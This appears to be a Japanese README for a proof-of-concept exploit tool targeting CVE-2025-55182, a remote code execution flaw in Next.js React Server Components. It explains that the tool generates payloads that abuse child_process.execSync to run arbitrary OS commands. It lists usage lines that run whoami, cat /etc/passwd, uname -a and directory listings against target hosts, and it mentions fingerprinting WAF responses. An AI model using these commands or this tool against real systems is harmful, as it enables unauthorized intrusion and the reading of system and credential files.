
POC-CVE-2025-55182
CVE-2025-55182 高度なスキャナー
CVE-2025-55182 向けのフル機能の悪用ユーティリティ — Next.js の React Server Components を介したリモートコード実行。 このスキャナーはマルチパートペイロードを自動的に生成し、process.mainModule.require('child_process').execSync() を悪用して、脆弱なインスタンス上で任意の OS コマンド実行を実現します。
機能
ペイロード自動生成 — 手動エンコード不要 クリーンな STDOUT 抽出を伴うコマンド実行 プロトコルの自動検出(欠けている場合は https:// を適用) 適切な URL デコード + 改行の復元 オペレータへの迅速なフィードバックのためのカラーリッチ出力 エラーフィンガープリント(500 / 403 / SSL / タイムアウト / WAF パターン)
インストール chmod +x scanner.sh
使用方法
./scanner.sh -d vulnerable-app.com
./scanner.sh -d vulnerable-app.com -c "whoami"
./scanner.sh -d http://localhost:3000 -c "cat /etc/passwd"
オプション

例
./scanner.sh -d shop.example.com
./scanner.sh -d shop.example.com -c "uname -a"
./scanner.sh -d shop.example.com -c "ls -la /var/www"
./scanner.sh -d shop.example.com -c "ping -c 4 google.com"
お気軽にこちらまでご連絡ください: mailto:[email protected]